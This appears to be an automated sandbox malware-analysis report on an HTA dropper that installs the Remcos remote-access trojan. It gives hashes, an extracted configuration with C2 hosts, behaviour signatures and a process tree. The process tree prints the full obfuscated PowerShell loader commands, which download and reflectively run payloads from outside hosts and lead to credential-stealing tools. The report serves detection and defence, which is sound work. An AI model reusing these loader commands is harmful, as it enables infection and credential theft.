Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11-11-2024 16:57

General

  • Target

    seethebestthingswithgoodthingswithgreatthignsfor.hta

  • Size

    281KB

  • MD5

    b36b8c1d87172cd3d7646f53a58d4936

  • SHA1

    f816a31bcb508052f54fa572eddf2e84ed7eef0c

  • SHA256

    134d52fbb53944f8d09eb33663c83f406e5fa15996afe1bb7e95eeef99298821

  • SHA512

    188c4f4b2a3e8659edf4fb88dd8cea3d91c3a44caa5b9350705393b65272538b63b581f6a044b2d24f74b1ba42cd2f9328e5253a690182235b093cd7ee57bf8e

  • SSDEEP

    48:4FhWsTROELdn97g5un7MqnQKb4VwoIADQKp4VwoIA8S29++RWPi+8d6Ba5L1nNQk:43FZ97HnQ8iQsrkV8d6Ba1jQtQsMpQpQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

RemoteHost

C2

shlobo.duckdns.org:9687

shlobo.duckdns.org:9374

shlobo.duckdns.org:8764

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-U2TQ1C

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with the display window hidden.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgoodthingswithgreatthignsfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3912
    • C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
      "C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'JGtrUUk4aCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRUZpbklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFVWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0dqbVhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWVZsc3VVTixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3FCamhCSkdxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdmV0NjeUhvR0wgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAka2tRSThoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xOTIvMzUvc2VldGhlYmVzdGdpcmxzZXZlcmRpZGJlc3R0aGlnbnN3aXRobXlzZWxmLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMiLDAsMCk7c1RBclQtU2xlRXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMi'+[cHar]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3424
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1528
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1068
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9664.tmp" "c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\CSCD13CE69C3ABA435D9E52E09D9D384042.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3448
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4532
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQc2hPTWVbNF0rJHBzSG9tRVszMF0rJ3gnKSggKCgnQU04aW1hZ2VVcmwgPSB5OWNuaHR0cHM6Ly8xMDE3LmZpbGVtJysnYWlsLmNvbS9hJysncGkvZicrJ2lsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDdCVTEnKydrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY18nKydUMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiB5OWNuO0FNOHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7QU04aW1hZ2VCeXRlcyA9IEFNJysnOHdlYkNsaWVudC5Eb3dubG9hZERhdGEoQU04aW1hZ2UnKydVcmwpO0FNOGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEFNJysnOGltYWdlQnl0ZScrJ3MpO0FNOHN0YXJ0RmxhZyA9IHk5Y248PCcrJ0JBU0U2NF9TVEFSVD4+eTljbjtBTThlbmRGbGFnJysnID0geTljbjw8QkEnKydTRTY0JysnX0VORD4+eTljbjtBTThzdGFydEluZGV4ID0gQScrJ004aW1hZ2VUZXh0LicrJ0luJysnZGV4T2YoQU04c3RhcnRGbGFnJysnKTtBJysnTThlbmRJbmRleCA9IEFNOGltYWdlVGV4dC5JbmRleE9mKEFNOGVuZEZsYWcpO0FNOHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBBTThlbmRJbmRleCAtZ3QgQU04c3RhcnRJbicrJ2QnKydleDtBTThzdGFydEluZGV4ICs9IEFNOHN0YXJ0RmxhZy5MZScrJ25ndCcrJ2g7QU04YmFzZTY0TGVuZ3RoID0gQU04ZW5kSW5kZXggLSBBTThzdGFydEluZGV4JysnO0FNOGJhc2U2NENvbW1hbmQgPSBBTThpbWFnZVRleHQuU3ViJysnc3RyaScrJ25nKEFNOHN0YXJ0SW5kZXgsIEFNOGJhc2U2NExlbmd0aCk7JysnQU04JysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoQU04YmFzZTY0Q29tbWFuZC4nKydUb0NoYXJBcnJheSgpIFBNVzYgRm9yRWFjaC1PYmplY3QgeyBBTThfIH0pWy0xLi4tKEFNOGJhc2UnKyc2NENvbW1hbmQuTGVuZ3RoKV07JysnQU0nKyc4Y29tbWFuJysnZEJ5dGVzID0gW1MnKyd5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhBTThiYXNlNjRSZXZlcnNlZCk7QU04bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEFNOGNvbW1hbmRCeXRlcyk7QU04dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh5OWNuVkFJeTljbik7QU04dmFpTWV0aG9kLkknKydudm9rZShBTThudWxsLCBAKHk5Y250eHQuRVJGVkdSRkUvNTMvMjkxLjg3MS42NC44OTEvLzpwdHRoeTljbiwgeTljbmRlc2F0JysnaXZhZG95OWNuLCB5OWNuZGVzYXRpdmFkb3k5Y24nKycsIHk5Y25kZXNhdGl2YWRveTljbiwgeTljbkNhc1BvbHk5YycrJ24sIHk5Y25kZXNhdGl2YWRveScrJzljbiwgeTljbmRlc2F0aXZhZG95OWNuLHk5Y25kZXNhdGl2YWRveTljJysnbix5OWNuZGVzYXRpdmFkb3k5Y24seTljbmRlc2F0aXZhZG95OWNuLHk5JysnY25kZXNhdGl2YWRveTljbix5OWNuZGVzYXQnKydpdmFkb3k5Y24seTljbjF5OWNuLHk5Y25kZXNhdGl2YWRveTljbikpOycpICAtY1JlcGxBY2UnUE1XNicsW0NoQVJdMTI0ICAtY1JlcGxBY2UoW0NoQVJdMTIxK1tDaEFSXTU3K1tDaEFSXTk5K1tDaEFSXTExMCksW0NoQVJdMzktcmVQTEFjZShbQ2hBUl02NStbQ2hBUl03NytbQ2hBUl01NiksW0NoQVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1220
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8imageText = [System.Text.Encoding]::UTF8.GetString(AM'+'8imageByte'+'s);AM8startFlag = y9cn<<'+'BASE64_START>>y9cn;AM8endFlag'+' = y9cn<<BA'+'SE64'+'_END>>y9cn;AM8startIndex = A'+'M8imageText.'+'In'+'dexOf(AM8startFlag'+');A'+'M8endIndex = AM8imageText.IndexOf(AM8endFlag);AM8startIndex -ge 0 -and AM8endIndex -gt AM8startIn'+'d'+'ex;AM8startIndex += AM8startFlag.Le'+'ngt'+'h;AM8base64Length = AM8endIndex - AM8startIndex'+';AM8base64Command = AM8imageText.Sub'+'stri'+'ng(AM8startIndex, AM8base64Length);'+'AM8'+'base64Reversed = -join (AM8base64Command.'+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];'+'AM'+'8comman'+'dBytes = [S'+'ystem.Convert]::FromBase64String(AM8base64Reversed);AM8loadedAssembly = [System.Reflection.Assembly]::Load(AM8commandBytes);AM8vaiMethod = [dnlib.IO.Home].GetMethod(y9cnVAIy9cn);AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));') -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3228
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1660
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\oqamudsefzxubcffwstba"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1072
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zkgeuvdxthpzlqtrncnddmlm"
                7⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:4944
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\bmtxvoorhphmowpvxnaworgvzeps"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4140

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    102B

    MD5

    ec4f509f9f4b3b8421920e041d0e2fb8

    SHA1

    5cee677e9e20bc9bb2a9ca23106da533d81b2b00

    SHA256

    49f7d448f66eac13abeb7bf296f6443c7b643fc7ab39703acfc9b882851a6d35

    SHA512

    e9d7d67d9d47e2744e5408b45bbfeb448d130238152a78415b6611b99eb44a1d45f889e4e0a75e712541122f40030d08369b0ffb14e36ceb2fe984c23cd53c2e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powerSHELl.eXE.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    f6e3380275aaaaca9f8590cd6a4799c5

    SHA1

    57d44d08df5eef95522927b72f32ce632dc33023

    SHA256

    09fbf5047273386f082b10758c13e54f10804f99357fac2e029e006f19edd965

    SHA512

    90194e77a76aa23145c753732d4b13e030de307afdda77897375c5f4c854d0c08523d7a7eccfee8ae3338cf81d9d2bec72091bdb3c9e90a34036c3d1a90e0ba1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    15456a5c09cc22fa355b2e615b485813

    SHA1

    47a44aefb3ec5df806ed63e8987836e5c99b9c90

    SHA256

    fc6916cab883c538cdb0903a86649b42e4bea48897e7904084c17af5a33188c4

    SHA512

    2d94a1b6c806642c0e0404b908a2f43b7ee6fcb05447cb3f68ad4ae0f1f19194aa0a100864cb2aa08c2de5c5b2969f33932358eea94c089c6dc99cf7e2657062

  • C:\Users\Admin\AppData\Local\Temp\RES9664.tmp

    Filesize

    1KB

    MD5

    cd1d6ebb844feaab4dcf017932c546b1

    SHA1

    6806659cf5ed03b786aee5ea7846b6baa96e4882

    SHA256

    75f469e974f77cbc719090600ec3baf89edddf62c6f8ce0ec1027386874f6c91

    SHA512

    207bb866066cf3cb59bdb9d2eb314a3e2697a4be2e1acdd9de74fdaf79663ba94b311b220ed1c2fea3942713da0b536adab076f458d9fde6f801708062345966

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2q0qygau.jpn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\oqamudsefzxubcffwstba

    Filesize

    4KB

    MD5

    79f35c7500a5cc739c1974804710441f

    SHA1

    24fdf1fa45049fc1a83925c45357bc3058bad060

    SHA256

    897101ed9da25ab0f10e8ad1aeb8dabc3282ccfdb6d3171dbac758117b8731f4

    SHA512

    03281e8abecff4e7d1f563596a4fd2513e016b7fbf011a455141460f9448d00b4a4666d2036cb448a8ac9a6feebeb51b366289ffa2ee5524a062fe8869aec61e

  • C:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.dll

    Filesize

    3KB

    MD5

    33c218c6a023474d5009560a703321ae

    SHA1

    08feb6bf8448a02cdd4117b79e2e5fcd53f41920

    SHA256

    4a40f2e65053ecfd480f0d7b266c7d93ca1e0d3e9e30a8eaf05a07c74bbfcff4

    SHA512

    36a7752fce4ef5aa283291e04458a258a8f4dcec3ad4ea58902289826c64ad80cf4483abc0b48c95420357efbfd4fe46ada3ecca1474c954de96d305f05f2090

  • C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs

    Filesize

    138KB

    MD5

    8e033f9bcfdc081ed84adcbf69b2cfed

    SHA1

    29919300cdba9322ec872189cea15ff7d573fc42

    SHA256

    4d489671247459e4b2c1403511606a2463199f1a5044d7e1841e5387b8c86e0a

    SHA512

    58fca96df828c75274613291f1048228076ef0516d4bcdd4e51cba3d9c9c566b6ce5f03387bfd60cb627bbd8a799b37593fd3624574afd50f6df6f9777754ac0

  • \??\c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\CSCD13CE69C3ABA435D9E52E09D9D384042.TMP

    Filesize

    652B

    MD5

    e61bf3a4f4e429954fe9a30eeb27d236

    SHA1

    93fb9a59a680703b952825d03ee26d9f9de1ee43

    SHA256

    1d5224bae9d877e37cd81423e7ec6945fa8ff8351347253247d60db23762d2a0

    SHA512

    a2945a998d83bd388a74f95e8e7d190751687bc70089454832497022854411f90ac167d320cda149999c5faf2fe14a52375329d05d962d4971c5776b665aaf88

  • \??\c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.0.cs

    Filesize

    464B

    MD5

    39d4a6691d37c11ed58d537b74f12aad

    SHA1

    caa119f2a0ad6f53ddb8a2447b379ac5ed11c1d6

    SHA256

    0ad0cda12412bd6fa525c0e4f876fb02a55a98e7555e5a43423c577465611df1

    SHA512

    f4d2f58e0c3a15aec4dd83b4268e9a4c1f3b5ef3c735204457e2115b9835af874f4d34b7311a182e7b395888b523e9f46bb8b6ca08db60ad9eda04b89013813c

  • \??\c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.cmdline

    Filesize

    369B

    MD5

    0ede2df604e147f5eb1c311b1721d351

    SHA1

    23333ef884816d64339eb5f8f5a87282404e0640

    SHA256

    526748a6a92d383ebf7ab651d7224aafed1bb56aa1a66a484d552cb3535b7a54

    SHA512

    710294fab258fc9786bbbebf5daafbf69ffbe1af946febe0c91baa7366739757ee2b4de9561f4bf01b01729dbf4860ee7088589d9ca999bd10d65f0cacd0c5af

  • memory/1072-123-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1072-130-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1072-125-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1220-91-0x0000000005A30000-0x0000000005D84000-memory.dmp

    Filesize

    3.3MB

  • memory/1528-45-0x0000000007830000-0x00000000078C6000-memory.dmp

    Filesize

    600KB

  • memory/1528-29-0x0000000007450000-0x0000000007482000-memory.dmp

    Filesize

    200KB

  • memory/1528-44-0x0000000007600000-0x000000000760A000-memory.dmp

    Filesize

    40KB

  • memory/1528-43-0x00000000075A0000-0x00000000075BA000-memory.dmp

    Filesize

    104KB

  • memory/1528-46-0x00000000077A0000-0x00000000077B1000-memory.dmp

    Filesize

    68KB

  • memory/1528-47-0x00000000077D0000-0x00000000077DE000-memory.dmp

    Filesize

    56KB

  • memory/1528-48-0x00000000077E0000-0x00000000077F4000-memory.dmp

    Filesize

    80KB

  • memory/1528-49-0x00000000078F0000-0x000000000790A000-memory.dmp

    Filesize

    104KB

  • memory/1528-50-0x0000000007820000-0x0000000007828000-memory.dmp

    Filesize

    32KB

  • memory/1528-42-0x0000000007BE0000-0x000000000825A000-memory.dmp

    Filesize

    6.5MB

  • memory/1528-41-0x0000000007490000-0x0000000007533000-memory.dmp

    Filesize

    652KB

  • memory/1528-40-0x0000000006800000-0x000000000681E000-memory.dmp

    Filesize

    120KB

  • memory/1528-30-0x000000006D480000-0x000000006D4CC000-memory.dmp

    Filesize

    304KB

  • memory/1660-157-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-104-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-165-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-173-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-164-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-158-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-137-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1660-150-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-149-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-142-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-141-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1660-122-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-121-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-172-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-105-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-109-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-106-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-140-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1660-113-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-115-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-114-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-116-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-117-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-119-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/3228-103-0x0000000007280000-0x000000000731C000-memory.dmp

    Filesize

    624KB

  • memory/3228-102-0x0000000007120000-0x0000000007278000-memory.dmp

    Filesize

    1.3MB

  • memory/3424-72-0x0000000070BC0000-0x0000000071370000-memory.dmp

    Filesize

    7.7MB

  • memory/3424-19-0x00000000060F0000-0x000000000613C000-memory.dmp

    Filesize

    304KB

  • memory/3424-4-0x0000000070BC0000-0x0000000071370000-memory.dmp

    Filesize

    7.7MB

  • memory/3424-0-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

    Filesize

    4KB

  • memory/3424-65-0x0000000006680000-0x0000000006688000-memory.dmp

    Filesize

    32KB

  • memory/3424-71-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

    Filesize

    4KB

  • memory/3424-73-0x0000000007480000-0x00000000074A2000-memory.dmp

    Filesize

    136KB

  • memory/3424-3-0x0000000005180000-0x00000000057A8000-memory.dmp

    Filesize

    6.2MB

  • memory/3424-74-0x0000000008340000-0x00000000088E4000-memory.dmp

    Filesize

    5.6MB

  • memory/3424-2-0x0000000070BC0000-0x0000000071370000-memory.dmp

    Filesize

    7.7MB

  • memory/3424-5-0x00000000050F0000-0x0000000005112000-memory.dmp

    Filesize

    136KB

  • memory/3424-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

    Filesize

    408KB

  • memory/3424-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp

    Filesize

    408KB

  • memory/3424-81-0x0000000070BC0000-0x0000000071370000-memory.dmp

    Filesize

    7.7MB

  • memory/3424-1-0x0000000004B10000-0x0000000004B46000-memory.dmp

    Filesize

    216KB

  • memory/3424-17-0x0000000005AC0000-0x0000000005E14000-memory.dmp

    Filesize

    3.3MB

  • memory/3424-18-0x00000000060C0000-0x00000000060DE000-memory.dmp

    Filesize

    120KB

  • memory/4140-126-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/4140-128-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/4140-129-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/4944-131-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/4944-124-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/4944-127-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB